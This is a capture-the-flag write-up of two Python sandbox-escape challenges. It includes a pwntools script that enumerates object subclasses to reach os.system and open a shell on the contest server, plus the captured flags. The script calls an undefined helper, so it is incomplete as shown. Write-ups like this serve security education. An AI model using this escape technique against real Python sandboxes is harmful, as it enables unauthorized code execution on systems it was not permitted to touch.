Misc
fast-forward (26 solves)
Description
Everyone always says Python is too slowβso let's speed it up!
nc fast-forward.hsctf.com 1337
Solution
In this case, i just focused about function or variable limitation. Through trial and error i found that lambda can "hide" function name and variable name.
To solve this challenge i use lambda to find out class and function that we can use for RCE. In this case we can found there is os._wrap_close by enumerating each index in subclasses. Here is the script i used to automate the process and trigger shell.
from pwn import *
def send(data):
r.recvuntil(b'> ')
r.sendline(data)
return r.recvline()
def exploit():
payload = "print('_wrap_close' in (lambda: str((1).__class__.__base__.__subclasses__()[{}]))())"
for i in range(0xff):
resp = send(format_leak(payload.format(i)))
print(i, resp)
if(resp.strip() == b'True'):
break
payload = f"(lambda: print((1).__class__.__base__.__subclasses__()[{i}].__init__.__globals__['system']('/bin/sh')))()"
r.recvuntil(b'> ')
r.sendline(payload.encode())
r = remote("fast-forward.hsctf.com", 1337)
exploit()
r.interactive()
Flag : flag{it_would_be_a_shame_if_there_were_a_bunch_of_numbers_at_the_end_2846880189}
fast-forward-v2 (22 solves)
Description
I made Python even faster than before!
nc fast-forward-v2.hsctf.com 1337
Solution
For fast-forward-v2 i used the same exploit as fast-forward :>
Flag : flag{one_day_i_will_write_a_pyjail_without_unintended_solutions_3421670241}
Last updated